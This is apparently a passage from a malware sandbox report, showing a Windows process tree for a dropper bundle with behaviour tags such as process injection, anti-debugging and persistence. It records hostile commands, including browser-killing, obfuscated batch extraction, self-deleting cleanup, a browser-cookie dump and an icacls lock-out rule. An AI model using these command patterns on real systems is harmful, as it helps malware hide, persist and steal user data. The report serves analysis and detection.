                                                                                                          "C:\Users\Admin\Documents\ilnel1zZWeKOEgx8fBMFC1lq.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4388
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd.exe /c taskkill /f /im chrome.exe
                                                                                                            7⤵
                                                                                                              PID:4668
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                8⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Modifies registry class
                                                                                                                PID:2284
                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                taskkill /f /im chrome.exe
                                                                                                                8⤵
                                                                                                                • Kills process with taskkill
                                                                                                                PID:2864
                                                                                                          • C:\Users\Admin\Documents\h8q0Ca3Skn9OVmy1drRsbZwj.exe
                                                                                                            "C:\Users\Admin\Documents\h8q0Ca3Skn9OVmy1drRsbZwj.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:2796
                                                                                                          • C:\Users\Admin\Documents\bAySVlHGh7_ZDKPB8zpXLfZj.exe
                                                                                                            "C:\Users\Admin\Documents\bAySVlHGh7_ZDKPB8zpXLfZj.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:4464
                                                                                                            • C:\Users\Admin\Documents\bAySVlHGh7_ZDKPB8zpXLfZj.exe
                                                                                                              C:\Users\Admin\Documents\bAySVlHGh7_ZDKPB8zpXLfZj.exe
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4520
                                                                                                          • C:\Users\Admin\Documents\96KoX5ciYraBMkOBbblBM4RW.exe
                                                                                                            "C:\Users\Admin\Documents\96KoX5ciYraBMkOBbblBM4RW.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4996
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-C0A7E.tmp\96KoX5ciYraBMkOBbblBM4RW.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-C0A7E.tmp\96KoX5ciYraBMkOBbblBM4RW.tmp" /SL5="$5014A,28982256,486912,C:\Users\Admin\Documents\96KoX5ciYraBMkOBbblBM4RW.exe"
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:4316
                                                                                                          • C:\Users\Admin\Documents\KmAvyEum_sh4r9SyWgeCRdHM.exe
                                                                                                            "C:\Users\Admin\Documents\KmAvyEum_sh4r9SyWgeCRdHM.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4924
                                                                                                            • C:\Users\Admin\Documents\KmAvyEum_sh4r9SyWgeCRdHM.exe
                                                                                                              "C:\Users\Admin\Documents\KmAvyEum_sh4r9SyWgeCRdHM.exe" -a
                                                                                                              7⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:2240
                                                                                                          • C:\Users\Admin\Documents\6QBd4z5SDFCJ9xp983HRg4L2.exe
                                                                                                            "C:\Users\Admin\Documents\6QBd4z5SDFCJ9xp983HRg4L2.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:4944
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /c cmd < Poi.vsd
                                                                                                              7⤵
                                                                                                                PID:4932
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd
                                                                                                                  8⤵
                                                                                                                    PID:1728
                                                                                                                    • C:\Windows\SysWOW64\findstr.exe
                                                                                                                      findstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd
                                                                                                                      9⤵
                                                                                                                        PID:3928
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                        Dare.exe.com D
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:3652
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                          10⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4280
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                            11⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4748
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                              12⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              PID:308
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                13⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:4176
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                  14⤵
                                                                                                                                    PID:1004
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                      15⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4340
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                        16⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        PID:1004
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                          17⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:5328
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                            18⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:5572
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                              19⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:5936
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                                20⤵
                                                                                                                                                  PID:4224
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Dare.exe.com D
                                                                                                                                                    21⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:5516
                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                            ping 127.0.0.1 -n 30
                                                                                                                            9⤵
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:4168
                                                                                                                    • C:\Users\Admin\Documents\78mN2XukigtuUo_GhoZrDkps.exe
                                                                                                                      "C:\Users\Admin\Documents\78mN2XukigtuUo_GhoZrDkps.exe"
                                                                                                                      6⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:4880
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\70879032832.exe"
                                                                                                                        7⤵
                                                                                                                          PID:3960
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:2168
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\70879032832.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\70879032832.exe"
                                                                                                                            8⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            PID:1012
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\70879032832.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\70879032832.exe"
                                                                                                                              9⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:5056
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1625743111496.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\1625743111496.exe"
                                                                                                                                10⤵
                                                                                                                                • Executes dropped EXE
                                                                                                                                PID:5384
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\33574589047.exe" /mix
                                                                                                                          7⤵
                                                                                                                            PID:5096
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\33574589047.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\33574589047.exe" /mix
                                                                                                                              8⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks processor information in registry
                                                                                                                              PID:4968
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\tcGwNNKxNdO.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\tcGwNNKxNdO.exe"
                                                                                                                                9⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Drops file in Program Files directory
                                                                                                                                PID:1812
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\New Feature\4.exe"
                                                                                                                                  10⤵
                                                                                                                                  • Drops startup file
                                                                                                                                  PID:3988
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
                                                                                                                                    11⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious behavior: AddClipboardFormatListener
                                                                                                                                    PID:4224
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\New Feature\vpn.exe"
                                                                                                                                  10⤵
                                                                                                                                    PID:6140
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /c cmd < Desideri.vssm
                                                                                                                                      11⤵
                                                                                                                                        PID:6088
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          cmd
                                                                                                                                          12⤵
                                                                                                                                            PID:5716
                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                              findstr /V /R "^DdxKEtxKiBrsjWeMWeHVMbRIxwOxUfTCZBFVZcXhPmGyTTvpqsQawImumMfCdZPSHAaKduMByzyjRLOBEFzCnBAdwnvhyxXQ$" Par.vssm
                                                                                                                                              13⤵
                                                                                                                                                PID:6008
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                Altrove.exe.com H
                                                                                                                                                13⤵
                                                                                                                                                  PID:5852
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                    14⤵
                                                                                                                                                      PID:5224
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                        15⤵
                                                                                                                                                          PID:4140
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                            16⤵
                                                                                                                                                              PID:4412
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                                17⤵
                                                                                                                                                                  PID:4952
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                                    18⤵
                                                                                                                                                                      PID:4692
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.001\Altrove.exe.com H
                                                                                                                                                                        19⤵
                                                                                                                                                                          PID:4088
                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                              ping 127.0.0.1 -n 30
                                                                                                                                                              13⤵
                                                                                                                                                              • Runs ping.exe
                                                                                                                                                              PID:3684
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\31183466343.exe" /mix
                                                                                                                                                  7⤵
                                                                                                                                                    PID:1960
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\31183466343.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\{Ic47-XRtDx-9BKc-UFdXj}\31183466343.exe" /mix
                                                                                                                                                      8⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks processor information in registry
                                                                                                                                                      PID:5064
                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\nailedp\edspolishpp.exe
                                                                                                                                                        edspolishpp.exe
                                                                                                                                                        9⤵
                                                                                                                                                          PID:5544
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im "78mN2XukigtuUo_GhoZrDkps.exe" /f & erase "C:\Users\Admin\Documents\78mN2XukigtuUo_GhoZrDkps.exe" & exit
                                                                                                                                                      7⤵
                                                                                                                                                        PID:4116
                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          8⤵
                                                                                                                                                            PID:3928
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            taskkill /im "78mN2XukigtuUo_GhoZrDkps.exe" /f
                                                                                                                                                            8⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:2708
                                                                                                                                                      • C:\Users\Admin\Documents\cGQcjRRSuLEz5rhXdBbPfkaF.exe
                                                                                                                                                        "C:\Users\Admin\Documents\cGQcjRRSuLEz5rhXdBbPfkaF.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4856
                                                                                                                                                        • C:\Users\Admin\Documents\cGQcjRRSuLEz5rhXdBbPfkaF.exe
                                                                                                                                                          "C:\Users\Admin\Documents\cGQcjRRSuLEz5rhXdBbPfkaF.exe"
                                                                                                                                                          7⤵
                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                          PID:868
                                                                                                                                                      • C:\Users\Admin\Documents\gRQewkLIItPZKre2EOxvGAmy.exe
                                                                                                                                                        "C:\Users\Admin\Documents\gRQewkLIItPZKre2EOxvGAmy.exe"
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        PID:4840
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im gRQewkLIItPZKre2EOxvGAmy.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\gRQewkLIItPZKre2EOxvGAmy.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                          7⤵
                                                                                                                                                            PID:1356
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill /im gRQewkLIItPZKre2EOxvGAmy.exe /f
                                                                                                                                                              8⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              PID:1692
                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                              timeout /t 6
                                                                                                                                                              8⤵
                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                              PID:5224
                                                                                                                                                        • C:\Users\Admin\Documents\mRvBOCcLi49IeJx4GuZajdqz.exe
                                                                                                                                                          "C:\Users\Admin\Documents\mRvBOCcLi49IeJx4GuZajdqz.exe"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Drops file in Program Files directory
                                                                                                                                                          PID:4736
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\file4.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\file4.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2644
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                            7⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:1192
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              8⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:4896
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                              8⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:2992
                                                                                                                                                          • C:\Program Files (x86)\Company\NewProduct\jingzhang.exe
                                                                                                                                                            "C:\Program Files (x86)\Company\NewProduct\jingzhang.exe"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:2284
                                                                                                                                                              • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                                                                                                                                "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",shl
                                                                                                                                                                8⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Modifies registry class
                                                                                                                                                                PID:5000
                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                              7⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                              • Drops file in Program Files directory
                                                                                                                                                              PID:204
                                                                                                                                                          • C:\Users\Admin\Documents\Mc8_EOWY83_Wyle62EATm1N0.exe
                                                                                                                                                            "C:\Users\Admin\Documents\Mc8_EOWY83_Wyle62EATm1N0.exe"
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:5088
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c arnatic_7.exe
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:1220
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.exe
                                                                                                                                                          arnatic_7.exe
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:2344
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_7.exe
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                            PID:2204
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c arnatic_4.exe
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:3356
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_4.exe
                                                                                                                                                          arnatic_4.exe
                                                                                                                                                          5⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                                                                          PID:3868
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:2132
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                            6⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                            PID:4672
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c arnatic_2.exe
                                                                                                                                                        4⤵
                                                                                                                                                        • Suspicious use of WriteProcessMemory
                                                                                                                                                        PID:1356
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:2128
                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                    C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                    2⤵
                                                                                                                                                    • Drops file in System32 directory
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:2752
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS86A62E54\arnatic_2.exe
                                                                                                                                                  arnatic_2.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                                                  PID:3948
                                                                                                                                                • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  1⤵
                                                                                                                                                  • Process spawned unexpected child process
                                                                                                                                                  PID:3928
                                                                                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                    2⤵
                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                    • Modifies registry class
                                                                                                                                                    PID:1352
                                                                                                                                                • \??\c:\windows\system32\svchost.exe
                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                  PID:5748
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C2D5.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C2D5.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:7108
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\C49B.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\C49B.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:7128
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1D0D.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\1D0D.exe
                                                                                                                                                  1⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:6176
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\20A8.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\20A8.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5092
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\23A6.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\23A6.exe
                                                                                                                                                    1⤵
                                                                                                                                                      PID:6492
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2751.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2751.exe
                                                                                                                                                      1⤵
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                                                      PID:5508
                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6452
                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1028
                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4924
                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                            • Suspicious behavior: MapViewOfSection
                                                                                                                                                            PID:4516
                                                                                                                                                          • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:6316
                                                                                                                                                            • C:\Windows\explorer.exe
                                                                                                                                                              C:\Windows\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                              PID:6296
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6604
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                PID:4884
                                                                                                                                                              • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2292
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B123.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B123.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:6972
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\B123.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\B123.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                    • Adds Run key to start application
                                                                                                                                                                    PID:348
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\Users\Admin\AppData\Local\59ac2eee-e9d8-46d3-820f-faabc11fe2a3" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:4068
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B123.exe
